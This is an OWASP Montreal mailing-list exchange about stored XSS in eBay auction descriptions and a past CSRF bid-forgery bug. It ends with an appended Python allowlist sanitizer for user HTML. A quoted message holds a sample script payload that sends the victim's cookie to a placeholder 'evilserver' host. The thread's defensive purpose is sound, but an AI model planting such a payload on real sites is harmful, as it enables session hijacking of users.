[ OWASP - Montreal ] Confusion about XSS...

Benoit Guerette benoit.guerette at gmail.com
Wed Dec 17 15:21:12 EST 2008


In fact, in 2004, eBay had an XSRF vulnerability, allowing
authenticated members to call a forged bid request to an 'attacker'
auction;  the forged bid was hidden inside an img tag within the
auction description... I saw the word "On Site request forgery" about
this.

So I was looking if an "On Site Scripting" vuln exists... Quite confusing...



On Wed, Dec 17, 2008 at 2:13 PM, Sean Coates <sean at caedmon.net> wrote:
> Am I wrong, or to be declared as an XSS vuln. the script must be injected from
> an external source, not the site itself?
>
> What if eBay allows html script tags in the auction text, is it an XSS? If
> not how do you call this? The site is the source...
>
> "Watch for sale. <script
> type="text/javascript">document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>"
>
> This script would send the authenticated user cookie to the attacker,
> allowing session hijacking.
>
> I would consider that a form of cross site scripting, even if it's not
> technically "cross site." eBay definitely should be filtering that out...
> think "Samy is my hero."
> This is where HtmlPurifier serves well (-:
> S
>



-- 
http://www.linkedin.com/in/benoitguerette
http://www.owasp.org/index.php/Montreal
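
Added example, not part of the original thread and not HtmlPurifier's code: a minimal allowlist filter for user-supplied auction descriptions, showing that the stored script tag and the hidden img tag discussed above are both removed before the text is rendered. The tag policy, the names sanitize and DescriptionSanitizer, and the sample inputs are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

# Assumed policy: a handful of formatting tags, no attributes at all.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "ul", "ol", "li"}
# Elements whose body must be discarded too, not just the tag itself.
DROP_WITH_CONTENT = {"script", "style"}


class DescriptionSanitizer(HTMLParser):
    """Re-emits only allowlisted tags; everything else is dropped or escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []       # sanitized output fragments
        self.removed = []   # rejected tag names, useful for logging or alerting
        self._skip = 0      # > 0 while inside a script/style element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skip += 1
            self.removed.append(tag)
        elif self._skip:
            return
        elif tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")   # attributes (onclick, style, ...) are discarded
        else:
            self.removed.append(tag)      # img, iframe, form, ... never reach the page

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skip = max(0, self._skip - 1)
        elif not self._skip and tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data))  # text is always re-encoded


def sanitize(description):
    """Return (safe_html, removed_tags) for one description."""
    parser = DescriptionSanitizer()
    parser.feed(description)
    parser.close()
    return "".join(parser.out), parser.removed
```

Removing img from user content only closes the on-site vector for the forged bid; the bid endpoint itself still needs its own request-forgery protection, such as a per-session token.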

